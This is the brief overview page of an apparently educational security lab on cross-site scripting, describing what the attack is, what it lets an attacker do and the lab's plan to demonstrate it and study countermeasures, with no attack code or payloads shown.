Overview

Cross-site scripting (XSS) is a type of exploits that relies on injecting executable code into the target website and later making the victims executing the code in their browser. It is one of the most prevalent web attacks in the last decade and ranks among the top 10 security risks by Open Web Application Security Project (OWASP) in 2017. With XSS, an attacker can steal session information or hijack the session of a victim, disclose and modify user data without a victim’s consent, and redirect a victim to other malicious websites. In this lab, we first explain how an XSS attack works with hands-on experiments, then analyze its conditions, and finally study countermeasures to this type of attack.

Conceptual Visualization

The following animation visualizes the concept of cross-site scripting attack.

Lab Instruction Materials